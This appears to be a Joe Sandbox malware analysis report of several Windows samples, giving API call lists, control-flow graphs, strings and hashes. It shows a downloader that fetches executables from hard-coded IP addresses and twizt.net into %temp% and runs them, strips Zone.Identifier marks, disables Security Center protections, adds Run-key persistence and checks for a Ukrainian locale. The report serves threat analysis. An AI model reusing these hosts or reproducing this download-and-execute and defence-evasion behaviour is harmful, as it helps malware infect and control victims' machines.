                                                                                • http://185.215.113.66/3, xrefs: 003910D0
                                                                                • http://185.215.113.66/6, xrefs: 003910F1
                                                                                • http://185.215.113.66/_2, xrefs: 00391107
                                                                                • http://185.215.113.66/_1, xrefs: 003910FC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.1922496157.0000000000391000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00390000, based on PE: true
                                                                                • Associated: 0000000D.00000002.1922475948.0000000000390000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.1922526704.0000000000394000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_390000_2711236308.jbxd
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$EnvironmentExistsExpandFilePathSleepStringswsprintf
                                                                                • String ID: http://185.215.113.66/1$http://185.215.113.66/2$http://185.215.113.66/3$http://185.215.113.66/4$http://185.215.113.66/5$http://185.215.113.66/6$http://185.215.113.66/_1$http://185.215.113.66/_2$http://185.215.113.66/_3
                                                                                • API String ID: 1624407425-19798704
                                                                                • Opcode ID: 05370f1475e02d0ea9ffac473329103bfe7c57124054a9ccf712039674ac7d83
                                                                                • Instruction ID: 1042aadee2afd0ae0d37f72a0764f330d006b349a4d5d18a2a4ac178c6417c8f
                                                                                • Opcode Fuzzy Hash: 05370f1475e02d0ea9ffac473329103bfe7c57124054a9ccf712039674ac7d83
                                                                                • Instruction Fuzzy Hash: 84F05E75281F15FB8B0367E5AC4FDDB3A6CAB48B52F400112F24AD52D1CA974448DBF6

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 5 391000-39104b ExpandEnvironmentStringsW wsprintfW 7 39104d-39104f 5->7 8 391053-39107c 5->8 9 39108d-391090 7->9 11 39108b 8->11 12 39107e-391084 8->12 11->9 12->11
                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 0039101A
                                                                                • wsprintfW.USER32 ref: 00391033
                                                                                • PathFileExistsW.KERNELBASE(?), ref: 00391043
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00391069
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00391085
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.1922496157.0000000000391000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00390000, based on PE: true
                                                                                • Associated: 0000000D.00000002.1922475948.0000000000390000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.1922511863.0000000000392000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.1922526704.0000000000394000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_390000_2711236308.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                • String ID: %s\ssss3444443.jpg$%userprofile%$@1Wu.Wu$^Iu
                                                                                • API String ID: 750032643-433313667
                                                                                • Opcode ID: 9dc2a1ce49239c667d9fa1f53f7c3a5d323799eb59411c69ab1708e2fbc6682e
                                                                                • Instruction ID: 575f0d43af3da0d61b79316b1e6cf10377f7751298d6b4f98fd67fe2ad20f3a7
                                                                                • Opcode Fuzzy Hash: 9dc2a1ce49239c667d9fa1f53f7c3a5d323799eb59411c69ab1708e2fbc6682e
                                                                                • Instruction Fuzzy Hash: 6B018FB0540708BBDB31DB609C4AFE7733CAB44704F0046A5B759A62D1DAB26AC8DBA5

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 000F1850
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 000F18E8
                                                                                • GetLastError.KERNEL32 ref: 000F18F4
                                                                                • ExitProcess.KERNEL32 ref: 000F1903
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000F196D
                                                                                • PathFindFileNameW.SHLWAPI(?), ref: 000F197A
                                                                                • wsprintfW.USER32 ref: 000F1999
                                                                                • DeleteFileW.KERNEL32(?), ref: 000F19A9
                                                                                • wcscmp.MSVCR90 ref: 000F19C2
                                                                                • ExitProcess.KERNEL32 ref: 000F19E1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteErrorFindLastModuleMutexPathSleepwcscmpwsprintf
                                                                                • String ID: %s%s$%s:Zone.Identifier$%s\%s$%s\%s$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Service$http://185.215.113.66/$http://193.233.132.177/$http://91.202.233.141/$winploravr.exe$xouauxuax
                                                                                • API String ID: 1209637258-903396872
                                                                                • Opcode ID: 7c804d89a22ff09a3cd485efbf2f0b17c89f8a7c361f37f914a71c0071cf6680
                                                                                • Instruction ID: 97c0d90c167154f9c44dcce716dcef57515f2154185c11c4c7d5484db9193f02
                                                                                • Opcode Fuzzy Hash: 7c804d89a22ff09a3cd485efbf2f0b17c89f8a7c361f37f914a71c0071cf6680
                                                                                • Instruction Fuzzy Hash: 7AF141F1A40318BBEB20DB60DC49FF97779AB48714F008589B309AA590DBB59B84EF54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 112 f1100-f1132 CryptImportKey 113 f1138-f1158 CreateFileW 112->113 114 f1316-f131c 112->114 115 f115e-f1171 GetFileSize 113->115 116 f130c-f1310 CryptDestroyKey 113->116 117 f1177-f1192 CreateFileMappingA 115->117 118 f1302-f1306 CloseHandle 115->118 116->114 119 f12de-f12e4 117->119 120 f1198-f11b1 MapViewOfFile 117->120 118->116 119->118 123 f12e6-f12fc SetFilePointer SetEndOfFile 119->123 121 f11b7-f11c0 120->121 122 f12d4-f12d8 CloseHandle 120->122 124 f12ca-f12ce UnmapViewOfFile 121->124 125 f11c6-f11cd 121->125 122->119 123->118 124->122 125->124 126 f11d3-f11dc 125->126 126->124 127 f11e2-f11fe CryptCreateHash 126->127 127->124 128 f1204-f1241 GetProcessHeap HeapAlloc 127->128 128->124 129 f1247-f127c call f1020 CryptHashData 128->129 132 f127e-f129d CryptVerifySignatureA 129->132 133 f12b7-f12c4 GetProcessHeap HeapFree 129->133 132->133 134 f129f-f12b4 memcpy 132->134 133->124 134->133
                                                                                APIs
                                                                                • CryptImportKey.ADVAPI32(?,000F31C8,00000214,00000000,00000000,00000000), ref: 000F112A
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 000F114B
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 000F1164
                                                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 000F1185
                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 000F11A4
                                                                                • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 000F11F6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F122D
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 000F1234
                                                                                  • Part of subcall function 000F1020: memcpy.MSVCR90 ref: 000F107F
                                                                                  • Part of subcall function 000F1020: memcpy.MSVCR90 ref: 000F1093
                                                                                  • Part of subcall function 000F1020: CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 000F10B7
                                                                                  • Part of subcall function 000F1020: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 000F10DD
                                                                                  • Part of subcall function 000F1020: CryptDestroyKey.ADVAPI32(00000000), ref: 000F10F0
                                                                                • CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 000F1274
                                                                                • CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 000F1295
                                                                                • memcpy.MSVCR90 ref: 000F12AF
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F12BD
                                                                                • HeapFree.KERNEL32(00000000), ref: 000F12C4
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 000F12CE
                                                                                • CloseHandle.KERNEL32(00000000), ref: 000F12D8
                                                                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 000F12F2
                                                                                • SetEndOfFile.KERNEL32(000000FF), ref: 000F12FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 000F1306
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 000F1310
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHandleHashImportProcessView$AllocDataEncryptFreeMappingPointerSignatureSizeUnmapVerify
                                                                                • String ID: NGS!
                                                                                • API String ID: 1316431928-4070929822
                                                                                • Opcode ID: 5a5fd0ec1130c74910eed70dd62d30d619bf378b1ed78d859bca6030c1c63df5
                                                                                • Instruction ID: e4aac0360d638e9c61bca7d8b567fafb489b8c743491883116f5b986afa3bd43
                                                                                • Opcode Fuzzy Hash: 5a5fd0ec1130c74910eed70dd62d30d619bf378b1ed78d859bca6030c1c63df5
                                                                                • Instruction Fuzzy Hash: 5B613975A00209EFEB14CBE4DC59FFEBBB5AB48710F108548F701A7680CB75AA40DBA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 149 f1020-f105c 150 f105e-f1064 149->150 151 f1066 149->151 152 f106d-f10bf memcpy * 2 CryptImportKey 150->152 151->152 153 f10f6-f10fc 152->153 154 f10c1-f10f0 CryptEncrypt CryptDestroyKey 152->154 154->153
                                                                                APIs
                                                                                • memcpy.MSVCR90 ref: 000F107F
                                                                                • memcpy.MSVCR90 ref: 000F1093
                                                                                • CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,00000000), ref: 000F10B7
                                                                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?,?), ref: 000F10DD
                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 000F10F0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$memcpy$DestroyEncryptImport
                                                                                • String ID:
                                                                                • API String ID: 774555595-0
                                                                                • Opcode ID: f27ddcf31f0ccf8d14d05301f552e1fc05770f37aa3b9fac729ec3f4d52796b1
                                                                                • Instruction ID: 157e600ea33bae86b40f7357b2677961554f0a3cc3a5190920626afbc77ecefb
                                                                                • Opcode Fuzzy Hash: f27ddcf31f0ccf8d14d05301f552e1fc05770f37aa3b9fac729ec3f4d52796b1
                                                                                • Instruction Fuzzy Hash: D13127B1D0024DEFEB04CFE8C845BEEBBB4AF4C700F008159EA05B7281DA759A44DBA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 155 f1740-f177c memset GetLocaleInfoA strcmp 156 f177e-f1780 155->156 157 f1782 155->157 158 f1784-f1787 156->158 157->158
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 000F174E
                                                                                • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A), ref: 000F1763
                                                                                • strcmp.MSVCR90 ref: 000F1772
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocalememsetstrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3255129521-64918367
                                                                                • Opcode ID: 893b299706533377114fa1722121b7f30a1234752ebdf7a218a128030e73bd5f
                                                                                • Instruction ID: 033f843784436d9f458092231ae39eb47f6d84209116a864bda993dec2d330df
                                                                                • Opcode Fuzzy Hash: 893b299706533377114fa1722121b7f30a1234752ebdf7a218a128030e73bd5f
                                                                                • Instruction Fuzzy Hash: 4BE0D876E4430CB6EA00B6A09C07FF933685B11B11F000154BF08564C1F5B56308E7D2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 000F1329
                                                                                • srand.MSVCR90 ref: 000F1330
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 000F1350
                                                                                • strlen.MSVCR90 ref: 000F135A
                                                                                • mbstowcs.MSVCR90 ref: 000F1371
                                                                                • rand.MSVCR90 ref: 000F1379
                                                                                • rand.MSVCR90 ref: 000F138D
                                                                                • wsprintfW.USER32 ref: 000F13B4
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 000F13CA
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 000F13F9
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 000F1428
                                                                                • memset.MSVCR90 ref: 000F144F
                                                                                • InternetReadFile.WININET(00000000,?,00000207,?), ref: 000F1471
                                                                                • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 000F14A2
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 000F14B1
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F14BC
                                                                                • wsprintfW.USER32 ref: 000F14D5
                                                                                • DeleteFileW.KERNEL32(?), ref: 000F14E5
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F14F0
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F1511
                                                                                • DeleteFileW.KERNEL32(?), ref: 000F153E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 000F154B
                                                                                • InternetCloseHandle.WININET(00000000), ref: 000F1558
                                                                                • InternetCloseHandle.WININET(00000000), ref: 000F1565
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F1570
                                                                                • rand.MSVCR90 ref: 000F1585
                                                                                • Sleep.KERNEL32 ref: 000F159C
                                                                                • rand.MSVCR90 ref: 000F15A2
                                                                                • rand.MSVCR90 ref: 000F15B6
                                                                                • wsprintfW.USER32 ref: 000F15D7
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 000F15E7
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 000F1601
                                                                                • wsprintfW.USER32 ref: 000F161D
                                                                                • DeleteFileW.KERNEL32(?), ref: 000F162D
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F1638
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F1659
                                                                                • DeleteFileW.KERNEL32(?), ref: 000F1677
                                                                                Strings
                                                                                • %ls:Zone.Identifier, xrefs: 000F1611
                                                                                • %ls:Zone.Identifier, xrefs: 000F14C9
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 000F13C5
                                                                                • %temp%, xrefs: 000F134B
                                                                                • %s\%d%d.exe, xrefs: 000F13A8
                                                                                • %s\%d%d.exe, xrefs: 000F15CB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$Open$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcsmemsetsrandstrlen
                                                                                • String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 789862300-1471993759
                                                                                • Opcode ID: 12eadcd23e50ae10f648dd8b974eeade731544c26e81292906ac62b8de2cb475
                                                                                • Instruction ID: 0f1f4806a6b9605451ee63e61d4aaf383e1141860910ff2abb3c88431789e33a
                                                                                • Opcode Fuzzy Hash: 12eadcd23e50ae10f648dd8b974eeade731544c26e81292906ac62b8de2cb475
                                                                                • Instruction Fuzzy Hash: 1181C2B1900318EBEB20DB60DC4AFF97379BB88700F044598B30A964C1DE79AB94DF61

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 135 f1690-f16f0 memset * 2 CreateProcessW 136 f16f2-f16ff Sleep 135->136 137 f1701-f1725 ShellExecuteW 135->137 138 f1738-f173b 136->138 139 f1727-f1734 Sleep 137->139 140 f1736 137->140 139->138 140->138
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 000F169E
                                                                                • memset.MSVCR90 ref: 000F16AE
                                                                                • CreateProcessW.KERNEL32(00000000,000F166B,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 000F16E7
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F16F7
                                                                                • ShellExecuteW.SHELL32(00000000,open,000F166B,00000000,00000000,00000000), ref: 000F1712
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F172C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: 77f7144955fe5e9f31eb8a494b4ba7dd5fadf17a65b45c204d1c9c877d679f05
                                                                                • Instruction ID: d564bc9db316c30c3365800056af46fa3644857266c858808269b2fb193f5119
                                                                                • Opcode Fuzzy Hash: 77f7144955fe5e9f31eb8a494b4ba7dd5fadf17a65b45c204d1c9c877d679f05
                                                                                • Instruction Fuzzy Hash: C5110D75A8430CFAEB50DB90CC46FEE7778AB54B01F200115FB096E6C1DAB5AA04EB65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 141 f1790-f17b4 InternetOpenA 142 f1828-f1839 Sleep 141->142 143 f17b6-f17d3 InternetOpenUrlA 141->143 144 f181e-f1822 InternetCloseHandle 143->144 145 f17d5-f17fc HttpQueryInfoA 143->145 144->142 146 f17fe-f1806 145->146 147 f1814-f1818 InternetCloseHandle 145->147 146->147 148 f1808-f1810 146->148 147->144 148->147
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 000F17A7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 000F17C6
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 000F17EF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 000F1818
                                                                                • InternetCloseHandle.WININET(00000000), ref: 000F1822
                                                                                • Sleep.KERNEL32(000003E8), ref: 000F182D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 000F17A2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1927326890.00000000000F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000F0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1927306828.00000000000F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927342041.00000000000F3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1927358732.00000000000F6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_f0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-173034443
                                                                                • Opcode ID: aecbc283a0eea4feeddc97f2b865fe40bdd3e107a3730773634e852bc6254087
                                                                                • Instruction ID: 77191dd966f3ce6a30a69c1824d65f0e7e8feb7d30b5257fed7b5d34fc112150
                                                                                • Opcode Fuzzy Hash: aecbc283a0eea4feeddc97f2b865fe40bdd3e107a3730773634e852bc6254087
                                                                                • Instruction Fuzzy Hash: 6A212975A40208FBEB10DF94CD49FEEB7B5BB08714F108098EA11AB6C0CBB56A01DB61

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 6f1070-6f10bb ExpandEnvironmentStringsW wsprintfW 2 6f10bd-6f10bf 0->2 3 6f10c3-6f10ec 0->3 4 6f10fd-6f1100 2->4 6 6f10ee-6f10f4 3->6 7 6f10fb 3->7 6->7 7->4
                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 006F108A
                                                                                • wsprintfW.USER32 ref: 006F10A3
                                                                                • PathFileExistsW.KERNELBASE(?), ref: 006F10B3
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 006F10D9
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 006F10F5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2003442179.00000000006F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006F0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2003429763.00000000006F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                • Associated: 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                • Associated: 0000000F.00000002.2003467319.00000000006F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_6f0000_330125677.jbxd
                                                                                Similarity
                                                                                • API ID: File$ChangeCloseCreateEnvironmentExistsExpandFindNotificationPathStringswsprintf
                                                                                • String ID: %s\78876rtb.jpg$%userprofile%$@1Wu.Wu$^Iu
                                                                                • API String ID: 2220190937-2331256390
                                                                                • Opcode ID: 95373204f9fa5ba72059cce2e51ef5323c26879b54b389334b5b750989675ec3
                                                                                • Instruction ID: 4e93a139ad326d4f6bf83e4263b46e36b6481fd98477ee5abad2a79c24efadd8
                                                                                • Opcode Fuzzy Hash: 95373204f9fa5ba72059cce2e51ef5323c26879b54b389334b5b750989675ec3
                                                                                • Instruction Fuzzy Hash: BD017CF154030DABDB309B609C4AFF5733AAB40704F0045A4A729A61D1DEB05AC5DFA9

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 006F1013
                                                                                • InternetOpenUrlA.WININET(00000000,http://twizt.net/ALLSTATA,00000000,00000000,00000000,00000000), ref: 006F1033
                                                                                • Sleep.KERNELBASE(000003E8), ref: 006F1041
                                                                                • InternetCloseHandle.WININET(?), ref: 006F104B
                                                                                • Sleep.KERNELBASE(000003E8), ref: 006F1056
                                                                                • InternetCloseHandle.WININET(00000000), ref: 006F1060
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 006F100E
                                                                                • http://twizt.net/ALLSTATA, xrefs: 006F102A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2003442179.00000000006F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006F0000, based on PE: true
                                                                                • Associated: 0000000F.00000002.2003429763.00000000006F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                • Associated: 0000000F.00000002.2003454543.00000000006F2000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                • Associated: 0000000F.00000002.2003467319.00000000006F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_6f0000_330125677.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpenSleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$http://twizt.net/ALLSTATA
                                                                                • API String ID: 256278798-1206238961
                                                                                • Opcode ID: a38da9d5d7e2389ff1880bb266c34853cc74d8cff617011996f3803eb32f657f
                                                                                • Instruction ID: f31ceba6b2e68ddeba90189190b3a30b0697a2d68274bf475e1fc9019be60b3d
                                                                                • Opcode Fuzzy Hash: a38da9d5d7e2389ff1880bb266c34853cc74d8cff617011996f3803eb32f657f
                                                                                • Instruction Fuzzy Hash: 14F01D76A80309FBE7209BA4DC5AFAD7B36AB44B01F204144BB056A2D0CEB06584DF39

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 11 6f1110-6f1128 Sleep call 6f1070 14 6f112f-6f1132 11->14 15 6f112a call 6f1000 11->15 15->14
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 006F1118
                                                                                  • Part of subcall function 006F1070: ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 006F108A
                                                                                  • Part of subcall function 006F1070: wsprintfW.USER32 ref: 006F10A3
                                                                                  • Part of subcall function 006F1070: PathFileExistsW.KERNELBASE(?), ref: 006F10B3
